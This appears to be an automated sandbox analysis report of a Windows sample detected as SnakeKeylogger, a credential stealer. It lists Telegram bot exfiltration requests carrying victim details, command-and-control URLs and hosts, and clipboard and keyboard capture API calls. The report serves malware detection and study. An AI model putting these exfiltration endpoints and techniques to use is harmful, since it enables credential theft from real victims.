                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49847 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49943 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49893 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49933 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49839 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49963 -> 104.21.32.1:443
                  Source: global traffic | TCP traffic: 192.168.2.9:49904 -> 3.130.71.34:587
                  Source: global traffic | HTTP traffic detected:
                      GET / HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                      Host: checkip.dyndns.org
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected:
                      GET / HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                      Host: checkip.dyndns.org
                  Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49770 version: TLS 1.0
                  Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49888 version: TLS 1.0
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0058CE44 InternetReadFile,SetEvent,GetLastError,SetEvent | 0_2_0058CE44
                  Source: global traffic | HTTP traffic detected:
                      GET /xml/8.46.123.189 HTTP/1.1
                      Host: reallyfreegeoip.org
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected:
                      GET /xml/8.46.123.189 HTTP/1.1
                      Host: reallyfreegeoip.org
                  Source: global traffic | HTTP traffic detected:
                      GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:34:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                      Host: api.telegram.org
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected:
                      GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2011:35:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                      Host: api.telegram.org
                      Connection: Keep-Alive
                  Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                  Source: global traffic | DNS traffic detected: DNS query: mail.acadental.com
                  Source: global traffic | HTTP traffic detected:
                      HTTP/1.1 404 Not Found
                      Server: nginx/1.18.0
                      Date: Sat, 11 Jan 2025 05:49:22 GMT
                      Content-Type: application/json
                      Content-Length: 55
                      Connection: close
                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Access-Control-Allow-Origin: *
                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global traffic | HTTP traffic detected:
                      HTTP/1.1 404 Not Found
                      Server: nginx/1.18.0
                      Date: Sat, 11 Jan 2025 05:49:37 GMT
                      Content-Type: application/json
                      Content-Length: 55
                      Connection: close
                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Access-Control-Allow-Origin: *
                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003435000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
                  Source: enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                  Source: enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003435000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.acadental.com
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                  Source: enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegSvcs.exe, 00000007.00000002.3794762480.000000000345B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.00000000033E4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003456000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000339E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                  Source: enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000332E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000007.00000002.3794762480.0000000003359000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000339E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003359000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegSvcs.exe, 00000007.00000002.3794762480.000000000348C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.0000000003415000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003487000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49788
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49963
                  Source: unknown | Network traffic detected: HTTP traffic on port 49922 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49953 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49815 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49912 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49933 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49826 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49963 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49839
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49815
                  Source: unknown | Network traffic detected: HTTP traffic on port 49847 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49902 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49912
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49933
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49953
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknown | Network traffic detected: HTTP traffic on port 49839 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49969 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49893
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49893 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknown | Network traffic detected: HTTP traffic on port 49943 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49826
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49969
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49847
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49902
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49922
                  Source: unknown | Network traffic detected: HTTP traffic on port 49888 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49888
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49943
                  Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49853 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49969 version: TLS 1.2
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0058EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_0058EAFF
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0058ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_0058ED6A
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00AAED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 2_2_00AAED6A
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0057AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput | 0_2_0057AA57
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_005A9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_005A9576
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00AC9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 2_2_00AC9576

System Summary

Source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: enterogenous.exe PID: 7460, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7496, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: enterogenous.exe PID: 7760, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: ty1nyFUMlo.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: ty1nyFUMlo.exe, 00000000.00000003.1368764291.0000000003EA1000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_de1b3d78-4
Source: ty1nyFUMlo.exe, 00000000.00000003.1368764291.0000000003EA1000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_c9496dba-6
Source: ty1nyFUMlo.exe, 00000000.00000000.1343887602.00000000005D2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_5ca27e0a-9
